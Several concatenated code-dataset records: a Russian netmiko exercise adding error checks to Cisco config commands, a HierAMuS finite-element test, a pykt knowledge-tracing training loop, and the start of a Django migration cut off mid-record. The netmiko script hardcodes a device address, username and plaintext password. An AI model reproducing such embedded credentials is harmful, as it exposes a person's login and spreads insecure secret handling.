24.2a.\r\n\r\nДополнить функционал метода send_config_set netmiko и добавить в него проверку\r\nна ошибки с помощью метода _check_error_in_command.\r\n\r\nМетод send_config_set должен отправлять команды по одной и проверять каждую на ошибки.\r\nЕсли при выполнении команд не обнаружены ошибки, метод send_config_set возвращает\r\nвывод команд.\r\n\r\nIn [2]: from task_24_2b import MyNetmiko\r\n\r\nIn [3]: r1 = MyNetmiko(**device_params)\r\n\r\nIn [4]: r1.send_config_set('lo')\r\n---------------------------------------------------------------------------\r\nErrorInCommand Traceback (most recent call last)\r\n in ()\r\n----> 1 
r1.send_config_set('lo')\r\n\r\n...\r\nErrorInCommand: При выполнении команды \"lo\" на устройстве 192.168.100.1 возникла ошибка \"Incomplete command.\"\r\n\r\n\"\"\"\r\nfrom netmiko.cisco.cisco_ios import CiscoIosSSH\r\nimport re\r\n\r\nclass ErrorInCommand(Exception):\r\n \"\"\"\r\n Исключение генерируется, если при выполнении команды на оборудовании, возникла ошибка.\r\n \"\"\"\r\n\r\nclass MyNetmiko(CiscoIosSSH):\r\n def __init__(self, **device_params):\r\n super().__init__(**device_params)\r\n self.enable()\r\n\r\n def _check_error_in_command(self, command, result):\r\n error_message = 'Команда \\\"{cmd}\\\" выполнилась с ошибкой \\\"{error}\\\" на устройстве \\\"{ip}\\\"'\r\n regex = \"% (?P<errmsg>.+)\"\r\n error_in_result = re.search(regex, result)\r\n if error_in_result:\r\n raise ErrorInCommand(\r\n error_message.format(\r\n cmd=command, ip = self.host, error=error_in_result.group(\"errmsg\")\r\n )\r\n )\r\n\r\n def send_command(self, command, *args, **kwargs):\r\n output = super().send_command(command)\r\n self._check_error_in_command(command, output)\r\n return output\r\n\r\n def send_config_set(self, config_commands, *args, **kwargs):\r\n # отправляем команды по одной и проверяем каждую на ошибки;\r\n # если ошибок нет, возвращаем вывод всех команд\r\n if type(config_commands) != list:\r\n config_commands = [config_commands]\r\n output = \"\"\r\n for command in config_commands:\r\n command_output = super().send_config_set(command, *args, **kwargs)\r\n self._check_error_in_command(command, command_output)\r\n output += command_output\r\n return output\r\n\r\nif __name__ == \"__main__\":\r\n device_params = {\r\n \"device_type\": \"cisco_ios\",\r\n \"ip\": \"172.17.20.41\",\r\n \"username\": \"ivankurop\",\r\n \"password\": \"qweszxc\",\r\n \"secret\": \"qweszxc\",\r\n }\r\n r1 = MyNetmiko(**device_params)\r\n #print(r1.send_command('sh sh'))\r\n r1.send_config_set(config_commands=['ntp logging', 'ntp serGer 10.0.0.3'], strip_command=False)", "repo_name": "ivan-kuropiatnyk/python-course-natenka", "sub_path": "page632_24-OOP-Inheritance-My/page637_task_24_2b_My.py", "file_name": "page637_task_24_2b_My.py", "file_ext": "py", "file_size_in_byte": 3158, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "netmiko.cisco.cisco_ios.CiscoIosSSH", "line_number": 37, "usage_type": "name"}, {"api_name": "re.search", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "40322813762", "text": "import os, sys\nimport HierAMuS\nimport gmsh\nimport unittest\n\ndef firstModel(order,meshid,solver):\n pathname = os.path.dirname(sys.argv[0])\n currPath = os.path.abspath(pathname)\n \n L = 10\n h = 1\n h1 = 1\n nx = 2\n ny = 3\n\n gmsh.initialize()\n gmsh.option.setNumber('General.Terminal', 0)\n\n gmsh.model.add('CantileverBeam')\n \n p1=gmsh.model.occ.addPoint(0,0,0)\n p2=gmsh.model.occ.addPoint(L/2,0,0)\n p3=gmsh.model.occ.addPoint(L/2,h,0)\n p4=gmsh.model.occ.addPoint(0,h,0)\n \n \n p5=gmsh.model.occ.addPoint(L/2,0,0)\n p6=gmsh.model.occ.addPoint(L,0,0)\n p7=gmsh.model.occ.addPoint(L,h,0)\n p8=gmsh.model.occ.addPoint(L/2,h,0)\n \n l1=gmsh.model.occ.addLine(p1,p2)\n l2=gmsh.model.occ.addLine(p2,p3)\n l3=gmsh.model.occ.addLine(p3,p4)\n l4=gmsh.model.occ.addLine(p4,p1)\n \n l5=gmsh.model.occ.addLine(p5,p6)\n l6=gmsh.model.occ.addLine(p6,p7)\n l7=gmsh.model.occ.addLine(p7,p8)\n l8=gmsh.model.occ.addLine(p8,p5)\n \n cl1=gmsh.model.occ.addCurveLoop([l1,l2,l3,l4])\n f1=gmsh.model.occ.addPlaneSurface([cl1])\n cl2=gmsh.model.occ.addCurveLoop([l5,l6,l7,l8])\n f2=gmsh.model.occ.addPlaneSurface([cl2])\n\n gmsh.model.occ.synchronize()\n \n
gmsh.model.mesh.setTransfiniteCurve(l1,nx+1)\n gmsh.model.mesh.setTransfiniteCurve(l3,nx+1)\n gmsh.model.mesh.setTransfiniteCurve(l2,ny+1)\n gmsh.model.mesh.setTransfiniteCurve(l4,ny+1)\n gmsh.model.mesh.setTransfiniteSurface(f1)\n \n gmsh.model.mesh.setTransfiniteCurve(l5,nx+1)\n gmsh.model.mesh.setTransfiniteCurve(l7,nx+1)\n gmsh.model.mesh.setTransfiniteCurve(l6,ny+1)\n gmsh.model.mesh.setTransfiniteCurve(l8,ny+1)\n gmsh.model.mesh.setTransfiniteSurface(f2)\n \n \n gmsh.option.setNumber(\"Mesh.RecombineAll\", 1)\n gmsh.model.mesh.generate(4)\n \n\n\n fesys = HierAMuS.FEMPy(currPath, 'firsttest')\n fesys.getMacroCommands().setLogLevel(fesys.NoLog(),fesys.NoLog())\n fesys.setStaticSolutionState()\n fesys.setSolver(solver)\n \n geo = fesys.getMeshCommands().getGeometryCommands()\n \n fromGM = fesys.getMeshCommands().getFromGMESH()\n fromGM.addGeomFromGmsh(gmsh)\n geo.checkGeometry()\n \n # Adding Element\n fromGM.addFaceElements(gmsh,[f1,f2],1)\n \n # Element definition\n fesys.getMeshCommands().getMaterialFormulations().addMA3_2D_LinearElastic_Isotrop(1,E=100,nu=0.3,thickness=1,plainstrain=0)\n fesys.getMeshCommands().getElementFormulations().addEL201_2DShell(num=1,meshiddisp=meshid,disporder=order,mode=1)\n fesys.getMeshCommands().addMaterial(1,matFormNum=1,elemFormNum=1)\n\n fesys.getMeshCommands().setDegreesOfFreedom()\n \n \n \n # Boundary Conditions\n edgeList = fromGM.getEdgeNumbers(gmsh,l4,1)\n fesys.getMeshCommands().getBoundaryConditions().BC(eltype=geo.edgeType(),number=edgeList,meshId=1,dofs=[1,1,1],shapeOrder=order)\n\n masterEdges = fromGM.getEdgeNumbers(gmsh,l2,1)\n slaveEdges = fromGM.getEdgeNumbers(gmsh,l8,1)\n a=[1,2,3]\n a.reverse()\n slaveEdges.reverse()\n \n\n fesys.getMeshCommands().getConstraintCommands().generalLink(geo.edgeType(),masterEdges,slaveEdges,1,order,0,0,1,1)\n fesys.getMeshCommands().getConstraintCommands().generalLink(geo.edgeType(),masterEdges,slaveEdges,1,order,1,1,1.0,1.0)\n\n loadEdges = fromGM.getEdgeNumbers(gmsh,l6,1)\n fesys.getMeshCommands().getBoundaryConditions().load(geo.edgeType(),loadEdges,1,[0,1,0],0)\n\n fesys.getMacroCommands().sparseSetUp()\n\n fesys.getMacroCommands().setPropFunction(number=0)\n fesys.getMacroCommands().setDt(1)\n fesys.getMacroCommands().timeincr()\n\n fesys.getMacroCommands().newton(refResidual=1e-11)\n \n sol = fesys.getMacroCommands().getSolution(fesys.getMeshCommands().getGeometryCommands().vertexType(),geomNumber=p6,meshId=meshid)\n\n \n return sol\n\n\nclass TestConstraint2D(unittest.TestCase):\n def __init__(self, methodName: str = \"Constraint2D\"):\n self.places=8\n super().__init__(methodName)\n \n def test_const1(self):\n sol=firstModel(1,1,1)\n self.assertAlmostEqual(sol[0],1.8756191968421505,places=self.places, msg=\"Test failed for solver 1\")\n self.assertAlmostEqual(sol[1],12.733402020529594,places=self.places, msg=\"Test failed for solver 1\")\n def test_const2(self):\n sol=firstModel(1,1,2)\n self.assertAlmostEqual(sol[0],1.8756191968421505,places=self.places, msg=\"Test failed for solver 2\")\n self.assertAlmostEqual(sol[1],12.733402020529594,places=self.places, msg=\"Test failed for solver 2\")\n def test_const3(self):\n sol=firstModel(1,1,3)\n self.assertAlmostEqual(sol[0],1.8756191968421505,places=self.places, msg=\"Test failed for solver 3\")\n self.assertAlmostEqual(sol[1],12.733402020529594,places=self.places, msg=\"Test failed for solver 3\")\n def test_const4(self):\n sol=firstModel(1,1,4)\n self.assertAlmostEqual(sol[0],1.8756191968421505,places=self.places, msg=\"Test failed for solver 
4\")\n self.assertAlmostEqual(sol[1],12.733402020529594,places=self.places, msg=\"Test failed for solver 4\")\n def test_const5(self):\n sol=firstModel(1,1,5)\n self.assertAlmostEqual(sol[0],1.8756191968421505,places=self.places, msg=\"Test failed for solver 5\")\n self.assertAlmostEqual(sol[1],12.733402020529594,places=self.places, msg=\"Test failed for solver 5\")\n def test_const6(self):\n sol=firstModel(1,1,6)\n self.assertAlmostEqual(sol[0],1.8756191968421505,places=self.places, msg=\"Test failed for solver 6\")\n self.assertAlmostEqual(sol[1],12.733402020529594,places=self.places, msg=\"Test failed for solver 6\")\n\n", "repo_name": "sklarmann/HierAMuS", "sub_path": "Tests/python/twoD/constraint/constrainttest.py", "file_name": "constrainttest.py", "file_ext": "py", "file_size_in_byte": 5621, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "gmsh.initialize", "line_number": 16, "usage_type": "call"}, {"api_name": "gmsh.option.setNumber", "line_number": 17, "usage_type": "call"}, {"api_name": "gmsh.option", "line_number": 17, "usage_type": "attribute"}, {"api_name": "gmsh.model.add", "line_number": 19, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 19, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 21, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 21, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 22, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 22, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 23, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 23, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 24, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 24, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 27, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 27, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 28, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 28, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 29, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 29, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPoint", "line_number": 30, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 30, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 32, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 32, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 33, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 33, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 34, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 34, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 35, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 35, "usage_type": "attribute"}, {"api_name": 
"gmsh.model.occ.addLine", "line_number": 37, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 37, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 38, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 38, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 39, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 39, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addLine", "line_number": 40, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 40, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addCurveLoop", "line_number": 42, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 42, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPlaneSurface", "line_number": 43, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addCurveLoop", "line_number": 44, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 44, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.addPlaneSurface", "line_number": 45, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 45, "usage_type": "attribute"}, {"api_name": "gmsh.model.occ.synchronize", "line_number": 47, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 47, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 49, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 49, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 50, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 50, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 51, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 51, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 52, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 52, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteSurface", "line_number": 53, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 53, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 55, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 55, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 56, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 56, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 57, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 57, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteCurve", "line_number": 58, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 58, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.setTransfiniteSurface", "line_number": 59, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 59, "usage_type": "attribute"}, {"api_name": "gmsh.option.setNumber", "line_number": 62, "usage_type": "call"}, {"api_name": "gmsh.option", "line_number": 62, "usage_type": "attribute"}, {"api_name": "gmsh.model.mesh.generate", "line_number": 63, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 63, "usage_type": "attribute"}, {"api_name": "HierAMuS.FEMPy", "line_number": 67, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 121, "usage_type": 
"attribute"}]} +{"seq_id": "8307039013", "text": "import os, sys\nimport torch\nimport torch.nn as nn\nfrom torch.nn.functional import one_hot, binary_cross_entropy\nimport numpy as np\nfrom .evaluate_model import evaluate\nfrom torch.autograd import Variable, grad\nfrom .atkt import _l2_normalize_adv\nfrom ..utils.utils import debug_print\nfrom IPython import embed\nfrom .emb import EMB\nfrom torch.optim import SGD, Adam\n\n# device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ndef cal_loss(model, ys, r, rshft, sm, preloss=[]):\n model_name = model.model_name\n\n if model_name in [\"dkt\", \"dkt_forget\", \"dkvmn\", \"kqn\", \"sakt\", \"saint\", \"atkt\", \"atktfix\", \"gkt\"]:\n\n y = torch.masked_select(ys[0], sm)\n t = torch.masked_select(rshft, sm)\n loss = binary_cross_entropy(y, t)\n elif model_name == \"dkt+\":\n y_curr = torch.masked_select(ys[1], sm)\n y_next = torch.masked_select(ys[0], sm)\n r_curr = torch.masked_select(r, sm)\n r_next = torch.masked_select(rshft, sm)\n loss = binary_cross_entropy(y_next, r_next)\n\n loss_r = binary_cross_entropy(y_curr, r_curr) # if answered wrong for C in t-1, cur answer for C should be wrong too\n loss_w1 = torch.masked_select(torch.norm(ys[2][:, 1:] - ys[2][:, :-1], p=1, dim=-1), sm[:, 1:])\n loss_w1 = loss_w1.mean() / model.num_c\n loss_w2 = torch.masked_select(torch.norm(ys[2][:, 1:] - ys[2][:, :-1], p=2, dim=-1) ** 2, sm[:, 1:])\n loss_w2 = loss_w2.mean() / model.num_c\n\n loss = loss + model.lambda_r * loss_r + model.lambda_w1 * loss_w1 + model.lambda_w2 * loss_w2\n elif model_name == \"akt\":\n y = torch.masked_select(ys[0], sm)\n t = torch.masked_select(rshft, sm)\n loss = binary_cross_entropy(y, t) + preloss[0]\n\n return loss\n\n\ndef model_forward(device, model, dataset_name, data):\n model_name = model.model_name\n emb_type = model.emb_type\n if model_name in [\"dkt_forget\"]:\n q, c, r, qshft, cshft, rshft, m, sm, d, dshft = data\n elif model_name in [\"saint\", \"akt\"] or dataset_name in [\"assist2015\"]:\n q, c, r, qshft, cshft, rshft, m, sm, q_diff, c_diff = data\n else: \n c, q, r, cshft, qshft, rshft, m, sm, c_diff, q_diff = data\n\n ys, preloss = [], []\n cq = torch.cat((q[:,0:1], qshft), dim=1)\n cc = torch.cat((c[:,0:1], cshft), dim=1)\n cr = torch.cat((r[:,0:1], rshft), dim=1)\n mm = torch.cat([torch.ones((m.shape[0], 1), dtype=torch.bool).to(device), m], dim=1)\n\n if model_name in [\"dkt\"]:\n y = model(c_diff[:,:-1].long(), c.long(), r.long(), cshft.long())\n # y = (y * one_hot(cshft.long(), model.num_c)).sum(-1)\n ys.append(y) # first: yshft\n elif model_name == \"dkt+\":\n y = model(c.long(), r.long())\n y_next = (y * one_hot(cshft.long(), model.num_c)).sum(-1)\n y_curr = (y * one_hot(c.long(), model.num_c)).sum(-1)\n ys = [y_next, y_curr, y]\n elif model_name in [\"dkt_forget\"]:\n y = model(c.long(), r.long(), d, dshft)\n y = (y * one_hot(cshft.long(), model.num_c)).sum(-1)\n ys.append(y)\n elif model_name in [\"dkvmn\"]:\n y = model(cc.long(), cr.long(), c_diff.long())\n ys.append(y[:,1:])\n elif model_name in [\"kqn\", \"sakt\"]:\n y = model(c_diff[:,:-1].long(), c.long(), r.long(), cshft.long())\n ys.append(y)\n elif model_name in [\"saint\"]:\n y = model(c_diff[:,:-1].long(), cq.long(), cc.long(), r.long())\n ys.append(y[:, 1:])\n elif model_name == \"akt\": \n y, reg_loss = model(c_diff.long(), cc.long(), cr.long(), cq.long())\n ys.append(y[:,1:])\n preloss.append(reg_loss)\n elif model_name in [\"atkt\", \"atktfix\"]:\n y, features = model(c.long(), r.long())\n y = (y * 
one_hot(cshft.long(), model.num_c)).sum(-1)\n loss = cal_loss(model, [y], r, rshft, sm)\n # at\n features_grad = grad(loss, features, retain_graph=True)\n p_adv = torch.FloatTensor(model.epsilon * _l2_normalize_adv(features_grad[0].data))\n p_adv = Variable(p_adv).to(device)\n pred_res, _ = model(c.long(), r.long(), p_adv)\n # second loss\n pred_res = (pred_res * one_hot(cshft.long(), model.num_c)).sum(-1)\n adv_loss = cal_loss(model, [pred_res], r, rshft, sm)\n loss = loss + model.beta * adv_loss\n elif model_name == \"gkt\":\n y = model(cc.long(), cr.long())\n ys.append(y) \n elif model_name.startswith(\"emb\"):\n y = model(cc.long())\n \n # cal loss\n if model_name in [\"emb\"] or emb_type == \"qid_emb\": \n mse_loss = nn.MSELoss()\n if y.squeeze().shape[-1] == c_diff.shape[-1]:\n loss = mse_loss(torch.masked_select(y.squeeze(), mm), torch.masked_select(c_diff, mm))\n else : \n loss = mse_loss(torch.masked_select(y.squeeze(), m), torch.masked_select(c_diff[:,:-1], m))\n\n elif model_name not in [\"atkt\", \"atktfix\"]:\n loss = cal_loss(model, ys, r, rshft, sm, preloss)\n\n return loss\n \n\ndef train_model(device, fold, model, dataset_name, train_loader, valid_loader, num_epochs, opt, ckpt_path, early_stopping, test_loader=None, test_window_loader=None, save_model=False):\n max_auc, best_epoch, min_loss = 0, -1, 100\n train_step = 0\n\n for i in range(1, num_epochs + 1):\n loss_mean = []\n # print(\"model:\", model.state_dict()[\"interaction_emb.weight\"][0][:10])\n for data in train_loader:\n train_step+=1\n model.train()\n loss = model_forward(device, model, dataset_name, data)\n total_loss = loss\n if model.emb_type.startswith(\"qid_\"):\n lambda_ = float(model.emb_type.split(\"_\")[-1])\n assert lambda_ >= 0, \"set proper lambda\"\n bf_emb = model.emb_type\n model.emb_type = \"qid_emb\"\n loss2 = model_forward(device, model, dataset_name, data)\n total_loss = (1-lambda_)*loss + lambda_*loss2 \n model.emb_type = bf_emb\n opt.zero_grad()\n total_loss.backward()\n opt.step()\n\n loss_mean.append(total_loss.detach().cpu().numpy())\n if model.model_name == \"gkt\" and train_step%10==0:\n text = f\"Total train step is {train_step}, the loss is {total_loss.item():.5}\"\n debug_print(text = text,fuc_name=\"train_model\")\n\n\n loss_mean = np.mean(loss_mean)\n auc, acc, mse = evaluate(device, model, dataset_name, valid_loader, model.model_name)\n ### atkt 有diff, 以下代码导致的\n ### auc, acc = round(auc, 4), round(acc, 4)\n\n if model.model_name == \"emb\":\n if mse < min_loss:\n if save_model:\n torch.save(model.state_dict(), os.path.join(ckpt_path, model.emb_type+f\"_model_{fold}.ckpt\"))\n\n min_loss = mse\n best_epoch = i\n testauc, testacc = -1, -1\n window_testauc, window_testacc = -1, -1\n if not save_model:\n if test_loader != None:\n save_test_path = os.path.join(ckpt_path, model.emb_type+\"_test_predictions.txt\")\n testauc, testacc, test_mse = evaluate(device, model, dataset_name, test_loader, model.model_name, save_test_path)\n if test_window_loader != None:\n save_test_path = os.path.join(ckpt_path, model.emb_type+\"_test_window_predictions.txt\")\n window_testauc, window_testacc, window_testmse= evaluate(device, model, dataset_name, test_window_loader, model.model_name, save_test_path)\n testauc, testacc, window_testauc, window_testacc = round(testauc, 4), round(testacc, 4), round(window_testauc, 4), round(window_testacc, 4)\n # window_testauc, window_testacc = -1, -1\n validauc, validacc, validmse = round(auc, 4), round(acc, 4), round(mse, 4)#model.evaluate(valid_loader, emb_type)\n 
# trainauc, trainacc = model.evaluate(train_loader, emb_type)\n # max_auc = round(max_auc, 4)\n print(f\"Epoch: {i}, validmse: {validmse:.4f}, best epoch: {best_epoch:.4f}, best min_loss: {min_loss:.4f}, train loss: {loss_mean:.4f}\")\n # print(f\" testauc: {testauc}, testacc: {testacc}, window_testauc: {window_testauc}, window_testacc: {window_testacc}\")\n \n if i - best_epoch > early_stopping.patience: \n print(\"Early stopped...\")\n break\n\n else: \n if auc > max_auc:\n if save_model:\n torch.save(model.state_dict(), os.path.join(ckpt_path, model.emb_type+f\"_model_{fold}.ckpt\"))\n max_auc = auc\n best_epoch = i\n testauc, testacc = -1, -1\n window_testauc, window_testacc = -1, -1\n if not save_model:\n if test_loader != None:\n save_test_path = os.path.join(ckpt_path, model.emb_type+\"_test_predictions.txt\")\n testauc, testacc, _ = evaluate(device, model, dataset_name, test_loader, model.model_name, save_test_path)\n if test_window_loader != None:\n save_test_path = os.path.join(ckpt_path, model.emb_type+\"_test_window_predictions.txt\")\n window_testauc, window_testacc, _ = evaluate(device, model, dataset_name, test_window_loader, model.model_name, save_test_path)\n testauc, testacc, window_testauc, window_testacc = round(testauc, 4), round(testacc, 4), round(window_testauc, 4), round(window_testacc, 4)\n # window_testauc, window_testacc = -1, -1\n validauc, validacc, validmse = round(auc, 4), round(acc, 4), round(mse, 4)#model.evaluate(valid_loader, emb_type)\n # trainauc, trainacc = model.evaluate(train_loader, emb_type)\n max_auc = round(max_auc, 4)\n print(f\"Epoch: {i}, validauc: {validauc:.4f}, validacc: {validacc:.4f}, best epoch: {best_epoch:.4f}, best auc: {max_auc:.4f}, loss: {loss_mean:.4f}\")\n # print(f\" testauc: {testauc}, testacc: {testacc}, window_testauc: {window_testauc}, window_testacc: {window_testacc}\")\n \n early_stopping(auc, i)\n\n if early_stopping.early_stop:\n print(\"Early stopped...\")\n break\n\n return testauc, testacc, window_testauc, window_testacc, validauc, validacc, validmse, best_epoch", "repo_name": "skewondr/Kiise_22KCC", "sub_path": "pykt/models/train_model.py", "file_name": "train_model.py", "file_ext": "py", "file_size_in_byte": 10458, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.masked_select", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional.binary_cross_entropy", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn.functional.binary_cross_entropy", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn.functional.binary_cross_entropy", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 40, "usage_type": 
"call"}, {"api_name": "torch.nn.functional.binary_cross_entropy", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.bool", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.one_hot", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn.functional.one_hot", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.functional.one_hot", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn.functional.one_hot", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.autograd.grad", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 94, "usage_type": "call"}, {"api_name": "atkt._l2_normalize_adv", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn.functional.one_hot", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.masked_select", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 113, "usage_type": "call"}, {"api_name": "utils.utils.debug_print", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 151, "usage_type": "call"}, {"api_name": "evaluate_model.evaluate", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "attribute"}, {"api_name": "evaluate_model.evaluate", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path", "line_number": 170, "usage_type": "attribute"}, {"api_name": "evaluate_model.evaluate", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path", "line_number": 187, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 194, "usage_type": "call"}, {"api_name": "os.path", "line_number": 194, "usage_type": "attribute"}, {"api_name": "evaluate_model.evaluate", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path", "line_number": 197, "usage_type": "attribute"}, {"api_name": "evaluate_model.evaluate", "line_number": 198, "usage_type": "call"}]} +{"seq_id": "39613213344", "text": "from django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n (\"forum\", \"0003_auto_20150414_2324\"),\n ]\n\n operations = [\n migrations.AlterField(\n model_name=\"topic\",\n name=\"is_locked\",\n field=models.BooleanField(default=False, db_index=True, verbose_name=b\"Est verrouill\\xc3\\xa9\"),\n preserve_default=True,\n 
